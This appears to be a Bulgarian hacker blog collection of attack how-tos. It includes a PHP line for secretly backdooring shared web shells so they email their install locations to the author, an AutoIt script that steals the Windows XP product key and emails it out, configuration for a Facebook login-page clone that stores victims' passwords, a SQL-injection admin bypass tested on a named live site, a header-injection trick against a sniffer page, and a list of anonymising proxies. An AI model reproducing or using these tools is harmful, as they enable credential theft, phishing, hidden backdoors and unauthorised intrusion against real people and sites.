Заразяване на Shell.

Как се заразява shell ? Целта е да вземете линка на сайта в който е качен , намирате си някой голям shell с много код и някъде по средата слагате този код.

<?php mail(‘Вашият емайл’, ‘url’, “http://”.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']); ?>

Така направете същото на няколко шела и просто разпространявайте шела , така няма нужда да разбивате сайтове за да качвате шел просто събирайте тези от емайла Ви.
Все още статията не е довършена мисля да направя скрипт който ги записва в файл на друг сървър , ако някой иска да ми помогне да пише коментар как може да стане това.

Анонимни в интернет как ?

Това става лесно и бързо трябва ви програмата Elite Proxy Switcher (вижте Полезни линкове)
Отваряте я и инсталирате ,първоначално нямате проксита за това натиснете + ще ви излезе
IP:[ ]Port:[ ] така сега ви трябва прокси намерете си тук: http://hidemyass.com/proxy-list/ , можете също да видите от мойте подбрани проксита: http://0f0xxx1.wordpress.com/2011/08/17/proxy-%d0%bb%d0%b8%d1%81%d1%82%d0%be%d0%b2%d0%b5-%d1%81-%d0%b2%d0%b8%d1%81%d0%be%d0%ba%d0%b0-%d0%b0%d0%bd%d0%be%d0%bd%d0%b8%d0%bc%d0%bd%d0%be%d1%81%d1%82/ изберете си , след това копирате ИП-то т.е. ето тези
77.78.3.83 останалите цифри са порта на проксито те са 9090 ,а останалото е държавата.Въвеждате ИП и порт и цъкате OK след това кликате 2пъти на ИП-то. Вижте картинката:

[AutoIT] WindowsXP CD-KEY stealer

http://pastebin.com/zWG1KuaR

Това е в pastebin ето го в цитат

;config {
$email = "Your email"
$password = "your password"
$att_file = "you file to attachment"
;end config }

$a = RegRead(“HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion”, “DigitalProductId”)
$a = StringRight($a, StringLen($a) – 2)
Dim $arrData[StringLen($a) / 2]
$intCurrent = 0
For $i = 1 To StringLen($a) – 1 Step 2
$arrData[$intCurrent] = Dec(StringMid($a, $i, 2))
$intCurrent += 1
Next
$strPC = “BCDFGHJKMPQRTVWXY2346789″
$ProductKey = “”
For $i = 0 To 28
$a = 0
For $j = 0 To 14
$a = $arrData[66 - $j] + $a * 256
$arrData[66 - $j] = BitAND(($a / 24), 255)
$a = Mod ($a, 24)
Next
$ProductKey = StringMid($strPC, $a + 1, 1) & $ProductKey
If (Mod(($i + 2), 6) = 0) And ($i < 28) Then
$i = $i + 1
$ProductKey = “-” & $ProductKey
EndIf
Next
$ss = $att_file
$str = “http://schemas.microsoft.com/cdo/configuration/”
$hMAIL = ObjCreate (“CDO.Message”)
With $hMAIL
.From = $email
.To = $email
.Subject = “WinXP KEY”
.TextBody = $ProductKey
.AddAttachment ($ss)
EndWith
With $hMAIL.Configuration.Fields
.Item ($str & “sendusing”) = 2
.Item ($str & “smtpserver”) = “smtp.mail.ru”
.Item ($str & “smtpauthenticate”) = 1
.Item ($str & “sendusername”) = $email
.Item ($str & “sendpassword”) = $password
.Item ($str & “smtpserverport”) = 2525
.Update
EndWith
$hMAIL.Send

Как да копираме сайт лесно и бързо.

Нагласете следните настройки:


//API - това са настройки за свързване към Приложение към компютъра
( за него ви трябват повече познания в сферата на СИСТЕМНОТО ПРОГРАМИРАНЕ )
пишете в форума ако искате да знаете как става защото е много дълго за обяснение.
$api_server = "";
$api_port = "";
$apit_timeout = "";
//opn_api($api_server,$api_port,$apit_timeout);

$to = “f0xxx1@mail.ru”; – Тук това е емайл на който ще се изпращат съобщения ако някой посети сайта Ви.
$sub = “Logger”; – Това е Заглавието на съобщението.
$msg = “$global_site_name/$global_file_name”; – тук е самото съобщение. сега това е сайта на фалшивата страница

$save_passwords = “1″; – 0 изключва паролите да се съхраняват.
$notification_activate = “1″; – 0 изключва изпращането на съобщения

$site_to_copy = “http://www.facebook.com/”; – сайта за копиране.
$replace_text = “https://www.facebook.com/login.php?login_attempt=1″; – Това е линка между action=”{TUK}” натиснете CTRL+U и след това CTRL+F и напишете action=” като го намерите копирате линка след него и го сложете тук.
$global_file_name = “passwords.txt”; – Името на файла в който ще се съхраняват паролите.
$global_site_name = “http://”.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];

Сега ето и пълния скрипт.

http://pastebin.com/MGSS8c0z

Proxy листове с висока анонимност.

ИП-ПОРТ-Държава

77.78.3.83 9090 flag Bulgaria
88.191.111.125 3128 flag France
141.20.103.211 3128 flag Germany
85.135.32.105 3128 flag Czech Republic
91.213.87.3 3129 flag Russian Federation
92.249.125.53 54321 flag Ukraine
202.64.115.226 8080 flag Hong Kong
217.219.97.11 3128 flag Iran
195.210.3.78 8000 flag Russian Federation
188.231.181.234 54321 flag Ukraine

FireCMS

Някаква система за администрация на сайтове в момента не може да се изтегли , но се намират уязвими сайтове.

FireCMS

CMS : http://sourceforge.net/projects/firecms/
Download: Not Avaliable
Author  : f0xxx1
Web     : http://0f0xxx1.wordpress.com/

Exploit

Admin Panel Bypass:
Username: ‘ OR ’1′ = ’1
Password: ‘ OR ’1′ = ’1

PoC=
Tested on http://comnet.bg/admin/

Как да манипулираме снифер ?

Или по специално the0.co.cc/sniff.php

Тъй като снифера е картинка която изпраща данни към сайта който ги приема и записва във файл , който се изкарва в
textarea ,беше лесно за маниполиране. За да вземе информацията като browser,referer и други са нужни header-и.
Тези header-и могат да се редактират с програмата Live HTTP headers.

Отворих я и започнах да записвам header-ите и след това намерих header-ите които се изпращаха към сървъра , дадах
User-Agent:  {Браузърът ви}  и му зададах тази стойност </textarea>  и дадох Reply.Резултата би трябвало да излезе всичко след </textarea>  на страницата , добре значи мога да вкарам някой shell или нещо подобно вътре. Ако сте разбрали до тук би трябвало да се сетите какво следва нататък…Няма да продължавам заради хахорщината която може да направи сайта на нищо.

.f0xxx1